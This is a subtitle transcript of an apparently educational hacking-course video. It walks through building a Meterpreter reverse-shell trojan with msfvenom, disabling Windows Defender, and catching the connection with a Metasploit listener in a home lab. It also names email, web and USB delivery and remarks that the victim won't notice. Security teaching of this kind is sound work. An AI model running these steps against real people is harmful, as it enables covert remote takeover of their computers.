1 00:00:00,270 --> 00:00:02,760 Instructor: Okay, it is time we see 2 00:00:02,760 --> 00:00:06,153 how we can gain access to the secured systems. 3 00:00:07,110 --> 00:00:09,270 In the previous few videos we talked about 4 00:00:09,270 --> 00:00:10,710 and we attacked machines 5 00:00:10,710 --> 00:00:12,960 that had some vulnerability inside of them, 6 00:00:12,960 --> 00:00:15,660 whether it was the operating system vulnerability, 7 00:00:15,660 --> 00:00:18,630 an outdated software, or weak credentials, 8 00:00:18,630 --> 00:00:21,270 we managed to exploit them through those vulnerabilities 9 00:00:21,270 --> 00:00:23,640 and gain access to them. 10 00:00:23,640 --> 00:00:26,100 But now let's see what happens 11 00:00:26,100 --> 00:00:29,970 if our target doesn't have any known vulnerability. 12 00:00:29,970 --> 00:00:31,740 What now? 13 00:00:31,740 --> 00:00:33,120 Well, remember I told you 14 00:00:33,120 --> 00:00:35,910 that the process of attacking is rather the same. 15 00:00:35,910 --> 00:00:40,050 In this case, we want to deliver the payload to the target 16 00:00:40,050 --> 00:00:41,790 and execute it. 17 00:00:41,790 --> 00:00:44,550 Just while the target had a vulnerability, 18 00:00:44,550 --> 00:00:46,800 we did this through an exploit, 19 00:00:46,800 --> 00:00:48,360 and through that vulnerability 20 00:00:48,360 --> 00:00:51,840 we managed to execute the payload ourselves. 21 00:00:51,840 --> 00:00:54,450 Now it becomes harder. 22 00:00:54,450 --> 00:00:57,210 We must deliver the payload to the target 23 00:00:57,210 --> 00:00:59,010 using some other method 24 00:00:59,010 --> 00:01:03,300 and the target has to execute the payload themselves. 25 00:01:03,300 --> 00:01:05,280 That is the hard part. 26 00:01:05,280 --> 00:01:08,220 The way you deliver the payload is completely up to you 27 00:01:08,220 --> 00:01:12,150 whether it is over an email, or over some HTTP page, 28 00:01:12,150 --> 00:01:15,300 over an USB drive, it doesn't matter. 29 00:01:15,300 --> 00:01:18,990 What matters is that the payload ends up on their machine 30 00:01:18,990 --> 00:01:21,033 and they double click and run it. 31 00:01:21,930 --> 00:01:25,050 For now, let us focus on just creating the payload 32 00:01:25,050 --> 00:01:27,780 and running it to see if it works. 33 00:01:27,780 --> 00:01:30,120 For this, I will use Kali Linux machine 34 00:01:30,120 --> 00:01:31,230 to create the payload 35 00:01:31,230 --> 00:01:35,310 and I will execute it on my main Windows 10 machine. 36 00:01:35,310 --> 00:01:37,770 You can run our payloads on the Windows 10 machine 37 00:01:37,770 --> 00:01:40,170 that we installed in the previous section 38 00:01:40,170 --> 00:01:42,960 or you can use any other Windows machine whatsoever, 39 00:01:42,960 --> 00:01:45,090 it doesn't even have to be a Windows 10, 40 00:01:45,090 --> 00:01:47,040 it is completely up to you. 41 00:01:47,040 --> 00:01:49,080 Just one thing that we must make sure 42 00:01:49,080 --> 00:01:50,760 is that Windows Defender 43 00:01:50,760 --> 00:01:53,823 and antivirus software are turned off. 44 00:01:54,660 --> 00:01:55,560 Why? 45 00:01:55,560 --> 00:01:57,630 Well, we are going to be creating a payload 46 00:01:57,630 --> 00:02:01,680 using MSFvenom tool from the Metasploit framework. 47 00:02:01,680 --> 00:02:04,560 And since many people use the exact same tool 48 00:02:04,560 --> 00:02:07,860 to create the exact same payloads as we will right now, 49 00:02:07,860 --> 00:02:11,550 those payloads are well known to every antivirus software 50 00:02:11,550 --> 00:02:14,370 and they will get detected quickly. 51 00:02:14,370 --> 00:02:17,730 However, for now our goal is not to bypass antiviruses 52 00:02:17,730 --> 00:02:20,910 but to just create a payload and get it to work. 53 00:02:20,910 --> 00:02:22,950 So turn off your Windows Defender 54 00:02:22,950 --> 00:02:24,870 and I will do it right here as well. 55 00:02:24,870 --> 00:02:28,740 You can go to this arrow, click on the Windows Defender. 56 00:02:28,740 --> 00:02:30,570 And the one thing that we want to turn off 57 00:02:30,570 --> 00:02:33,240 is under this virus and threat protection. 58 00:02:33,240 --> 00:02:35,730 We want to go to the managed settings 59 00:02:35,730 --> 00:02:39,270 and turn off the real time protection. 60 00:02:39,270 --> 00:02:41,580 It'll ask you for the administrator password 61 00:02:41,580 --> 00:02:42,870 and once you type it in, 62 00:02:42,870 --> 00:02:45,810 it'll turn off the real time protection 63 00:02:45,810 --> 00:02:46,910 as it says right here. 64 00:02:47,880 --> 00:02:49,410 So I will close this 65 00:02:49,410 --> 00:02:53,040 and now let's create our very first Trojan. 66 00:02:53,040 --> 00:02:54,450 As I already said for this, 67 00:02:54,450 --> 00:02:57,720 we'll be using a tool called MSFvemon 68 00:02:57,720 --> 00:03:00,600 So I will open a terminal terminal right here. 69 00:03:00,600 --> 00:03:02,100 Why we are using MSFvenom? 70 00:03:02,100 --> 00:03:03,270 Well, it is a known tool 71 00:03:03,270 --> 00:03:06,510 and it is used to generate payloads really fast. 72 00:03:06,510 --> 00:03:10,140 In just one command, we will be able to generate a program 73 00:03:10,140 --> 00:03:13,470 that will gain us an access to the target system. 74 00:03:13,470 --> 00:03:17,310 So let us see how we can create a simple one first. 75 00:03:17,310 --> 00:03:21,033 If I type the command msfvenom -h, 76 00:03:21,990 --> 00:03:25,830 right here we are going to see our available options 77 00:03:25,830 --> 00:03:27,630 with the MSFvenom. 78 00:03:27,630 --> 00:03:31,500 And up here we also get examples of usage, 79 00:03:31,500 --> 00:03:33,930 which tells us how we can generate 80 00:03:33,930 --> 00:03:36,813 a simple payload right here. 81 00:03:37,650 --> 00:03:40,020 Let's follow the example and try it out. 82 00:03:40,020 --> 00:03:43,260 Now it tells us right here that to run the MSFvenom, 83 00:03:43,260 --> 00:03:46,560 we need to specify the entire path right here. 84 00:03:46,560 --> 00:03:49,353 But instead we can just specify MSFvenom. 85 00:03:51,690 --> 00:03:54,300 It'll still recognize it as the tool that we need 86 00:03:54,300 --> 00:03:58,920 and we can write our options right after it. 87 00:03:58,920 --> 00:04:01,860 So let me clear the screen so we can see the command better. 88 00:04:01,860 --> 00:04:06,860 And if I go and type msfvenom, we want to use the -p option, 89 00:04:07,290 --> 00:04:10,050 and this -p option stands for payload. 90 00:04:10,050 --> 00:04:13,560 So here we specify which type of payload are we creating. 91 00:04:13,560 --> 00:04:15,720 In my case, since I'm going to be attacking 92 00:04:15,720 --> 00:04:18,269 this Windows 10 64 bit machine, 93 00:04:18,269 --> 00:04:19,500 I want to generate 94 00:04:19,500 --> 00:04:24,500 a Windows/x64/meterpreter/reverse_tcp payload. 95 00:04:30,240 --> 00:04:34,320 I'm using a 64 bit because my machine is a 64-bit machine, 96 00:04:34,320 --> 00:04:37,320 and I'm using a reverse shell connection. 97 00:04:37,320 --> 00:04:40,440 Another option that we must specify is the LHOST, 98 00:04:40,440 --> 00:04:44,790 and LHOST is the IP address of your Kali Linux machine. 99 00:04:44,790 --> 00:04:48,300 So 192.168.1.12. 100 00:04:48,300 --> 00:04:50,820 In my case, I will just double check it. 101 00:04:50,820 --> 00:04:54,600 So sudo ifconfig, test1234 is my password. 102 00:04:54,600 --> 00:04:57,333 And here it is, the IP address is correct. 103 00:04:59,280 --> 00:05:00,270 Great. 104 00:05:00,270 --> 00:05:03,300 Another option we must specify is the local port. 105 00:05:03,300 --> 00:05:05,970 And by the way, this LHOST stands for local host, 106 00:05:05,970 --> 00:05:07,740 not sure if I mentioned it. 107 00:05:07,740 --> 00:05:09,510 And the local port is the port 108 00:05:09,510 --> 00:05:11,130 that the target will connect to. 109 00:05:11,130 --> 00:05:13,890 In our case, we can set that to be any port that we want. 110 00:05:13,890 --> 00:05:15,903 For example, let's use 5555. 111 00:05:18,030 --> 00:05:21,210 After that we can use the dash -f option 112 00:05:21,210 --> 00:05:24,240 to specify the file type that we want to create. 113 00:05:24,240 --> 00:05:27,840 So since we are attacking a Windows machine in this video, 114 00:05:27,840 --> 00:05:30,540 I'm going to be creating an exe file. 115 00:05:30,540 --> 00:05:32,583 So I will just type -f and then exe. 116 00:05:33,450 --> 00:05:37,980 And the last option that I want to specify is -o. 117 00:05:37,980 --> 00:05:40,530 And this -o stands for output. 118 00:05:40,530 --> 00:05:42,900 Here we specify the name of the file. 119 00:05:42,900 --> 00:05:45,453 I will just call it shell.exe. 120 00:05:46,380 --> 00:05:48,810 This is all we will specify for now. 121 00:05:48,810 --> 00:05:51,900 So once again, we are creating a 64-bit payload 122 00:05:51,900 --> 00:05:53,580 for the Windows target. 123 00:05:53,580 --> 00:05:54,660 We set the local host, 124 00:05:54,660 --> 00:05:56,490 which will be written inside the payload 125 00:05:56,490 --> 00:05:59,310 so the target can connect to our Kali Linux machine, 126 00:05:59,310 --> 00:06:01,740 and we also specify local port 127 00:06:01,740 --> 00:06:04,080 to which the target will connect to. 128 00:06:04,080 --> 00:06:07,590 After that, we mentioned that the file type will be .exe, 129 00:06:07,590 --> 00:06:09,630 which is an executable for Windows, 130 00:06:09,630 --> 00:06:12,540 and at the end we output all of this 131 00:06:12,540 --> 00:06:14,043 with a name o shell.exe. 132 00:06:15,030 --> 00:06:16,120 Let's press enter 133 00:06:18,360 --> 00:06:20,280 and here it is. 134 00:06:20,280 --> 00:06:23,883 Our payload is right here on our Kali Linux desktop. 135 00:06:24,720 --> 00:06:25,980 Here we can see it, 136 00:06:25,980 --> 00:06:27,543 shell.exe. 137 00:06:28,620 --> 00:06:31,890 This program, once executed on the target machine 138 00:06:31,890 --> 00:06:33,150 will grant us an access 139 00:06:33,150 --> 00:06:36,003 and give us the meterpreter shell on that machine. 140 00:06:37,020 --> 00:06:39,570 Let's move it real quick to the target machine. 141 00:06:39,570 --> 00:06:42,320 And this is something that you can do however you want. 142 00:06:43,350 --> 00:06:46,620 You can plug in the USB device by going in Kali Linux 143 00:06:46,620 --> 00:06:49,080 then on the devices then USB, 144 00:06:49,080 --> 00:06:51,810 and select the USB device right here. 145 00:06:51,810 --> 00:06:53,700 Then you will transfer it to the USB device. 146 00:06:53,700 --> 00:06:55,740 And from the USB device you will transfer it 147 00:06:55,740 --> 00:06:58,560 to your target Windows machine, 148 00:06:58,560 --> 00:07:01,053 or you can also go to the devices, 149 00:07:02,010 --> 00:07:05,010 click on drag and drop and set to be directional. 150 00:07:05,010 --> 00:07:08,880 This simply means that you can just copy the file 151 00:07:08,880 --> 00:07:11,460 from the Kali Linux desktop and paste it 152 00:07:11,460 --> 00:07:16,020 or just drag it to the Windows 10 desktop, in my case. 153 00:07:16,020 --> 00:07:17,790 In case you're using another virtual machine 154 00:07:17,790 --> 00:07:20,220 that you're attacking, you can just copy it first 155 00:07:20,220 --> 00:07:21,270 to your main machine desktop 156 00:07:21,270 --> 00:07:23,970 and then from the main machine desktop copy it 157 00:07:23,970 --> 00:07:26,100 to the desktop of your virtual machine. 158 00:07:26,100 --> 00:07:28,350 Just make sure that in the target virtual machine 159 00:07:28,350 --> 00:07:31,203 you also set the drag and drop to be directional. 160 00:07:32,220 --> 00:07:34,680 Great, now we got our shell.exe, 161 00:07:34,680 --> 00:07:37,590 or our payload on the target machine. 162 00:07:37,590 --> 00:07:40,110 Great, but we are not done yet. 163 00:07:40,110 --> 00:07:41,910 Remember that this shell will attempt 164 00:07:41,910 --> 00:07:44,940 to connect to our Kali Linux machine once executed 165 00:07:44,940 --> 00:07:46,680 since it is a reverse shell. 166 00:07:46,680 --> 00:07:50,850 And it'll connect on the port 5555. 167 00:07:50,850 --> 00:07:53,010 In order for connection to be established, 168 00:07:53,010 --> 00:07:56,220 we must be listening on that port and have it open 169 00:07:56,220 --> 00:08:00,480 in order for target to even be able to connect back to us. 170 00:08:00,480 --> 00:08:02,100 This is something Metasploit framework 171 00:08:02,100 --> 00:08:03,510 manually configured for us 172 00:08:03,510 --> 00:08:06,540 once we performed our exploitation of our vulnerability. 173 00:08:06,540 --> 00:08:09,360 But right now we must do it manually. 174 00:08:09,360 --> 00:08:13,080 And we can do it with the help of MSF console as well. 175 00:08:13,080 --> 00:08:14,310 So what I'm going to do 176 00:08:14,310 --> 00:08:17,223 is I'm going to start the MSF console, 177 00:08:19,320 --> 00:08:20,670 and once it opens up 178 00:08:20,670 --> 00:08:25,670 I want to type use exploit multi and then handler. 179 00:08:27,240 --> 00:08:29,910 And this is not an actual exploit. 180 00:08:29,910 --> 00:08:31,680 You can imagine this as something 181 00:08:31,680 --> 00:08:33,840 that will listen for the incoming connection 182 00:08:33,840 --> 00:08:35,490 from our payload. 183 00:08:35,490 --> 00:08:38,159 It is also called a listener. 184 00:08:38,159 --> 00:08:39,179 So let's set it up. 185 00:08:39,179 --> 00:08:41,039 If I clear the screen to see it better 186 00:08:41,039 --> 00:08:44,880 and type show options, there is only one thing 187 00:08:44,880 --> 00:08:47,340 that we need to set and that is the payload. 188 00:08:47,340 --> 00:08:49,200 So the payload in this bracket 189 00:08:49,200 --> 00:08:52,323 must match the payload that the target will execute. 190 00:08:53,250 --> 00:08:58,250 So let's change, set payload to Windows x64 meterpreter 191 00:09:01,800 --> 00:09:03,183 and then reverse_tcp. 192 00:09:04,530 --> 00:09:06,540 Show options once again, 193 00:09:06,540 --> 00:09:08,077 and we must set the LHOST 194 00:09:08,077 --> 00:09:11,340 and LPORT to match from the MSFvenom command. 195 00:09:11,340 --> 00:09:15,570 So set LHOST to be the IP address of my Kali Linux machine 196 00:09:15,570 --> 00:09:20,343 which is .1.12 and set the LPORT to be 5555. 197 00:09:21,270 --> 00:09:24,390 Once we set up all of these settings, we can run it. 198 00:09:24,390 --> 00:09:25,683 So I'll just type run. 199 00:09:26,760 --> 00:09:29,340 We can see it is now listening for the connections 200 00:09:29,340 --> 00:09:33,000 and nothing else is really happening right here. 201 00:09:33,000 --> 00:09:33,833 Why? 202 00:09:33,833 --> 00:09:36,780 Well, because the shell on the target system 203 00:09:36,780 --> 00:09:38,640 hasn't been ran yet. 204 00:09:38,640 --> 00:09:40,773 So let's run it on Windows machine. 205 00:09:41,820 --> 00:09:45,510 Double click and you will see nothing is opening. 206 00:09:45,510 --> 00:09:49,170 But if I go back to my Kali Linux machine, here it is. 207 00:09:49,170 --> 00:09:51,960 Here is our meterpreter session opened, 208 00:09:51,960 --> 00:09:54,600 and it is identical to the ones that we had 209 00:09:54,600 --> 00:09:57,480 during our vulnerability exploitation section. 210 00:09:57,480 --> 00:10:00,960 Just this time we created and delivered it manually, 211 00:10:00,960 --> 00:10:04,350 and we also manually set up our listener. 212 00:10:04,350 --> 00:10:08,250 Keep in mind that this didn't exploit any vulnerability, 213 00:10:08,250 --> 00:10:11,340 we are just relying on the mistake from the other person 214 00:10:11,340 --> 00:10:15,120 that is using target machine to execute our file. 215 00:10:15,120 --> 00:10:17,490 Otherwise, if the file doesn't get executed, 216 00:10:17,490 --> 00:10:20,430 we don't get access to their machine. 217 00:10:20,430 --> 00:10:23,340 And another thing to keep in mind is that listener 218 00:10:23,340 --> 00:10:27,450 or in our case, this multi handler that we have 219 00:10:27,450 --> 00:10:31,620 must be ran before the payload or before this shell.exe, 220 00:10:31,620 --> 00:10:35,220 which is kind of logical since if the target runs our file 221 00:10:35,220 --> 00:10:37,860 and we weren't listening for the connection, 222 00:10:37,860 --> 00:10:41,370 then they won't be able to connect to our machine. 223 00:10:41,370 --> 00:10:44,280 You can also notice on target's desktop once again 224 00:10:44,280 --> 00:10:45,990 nothing is really happening. 225 00:10:45,990 --> 00:10:46,823 So they might think 226 00:10:46,823 --> 00:10:49,290 that the program they executed didn't work 227 00:10:49,290 --> 00:10:51,663 and they won't question it that much. 228 00:10:52,590 --> 00:10:55,080 But of course we got the connection right here 229 00:10:55,080 --> 00:10:59,100 and we can use all of the commands the meterpreter gives us. 230 00:10:59,100 --> 00:11:04,020 We can as usual enter a shell, type who am I, 231 00:11:04,020 --> 00:11:06,570 type ipconfig, and all the other commands 232 00:11:06,570 --> 00:11:08,340 that we can execute. 233 00:11:08,340 --> 00:11:10,770 Type dir to check out all of the available files 234 00:11:10,770 --> 00:11:12,180 on the desktop. 235 00:11:12,180 --> 00:11:15,550 And if I exit this, exit out of the meterpreter shell 236 00:11:16,440 --> 00:11:19,770 since we successfully gained access to it once again. 237 00:11:19,770 --> 00:11:20,603 But keep in mind 238 00:11:20,603 --> 00:11:23,130 that of course this was just a basic example, 239 00:11:23,130 --> 00:11:24,990 and we will see in the next few videos 240 00:11:24,990 --> 00:11:29,160 how to create a little bit more complex payloads. 241 00:11:29,160 --> 00:11:30,460 See you in the next video.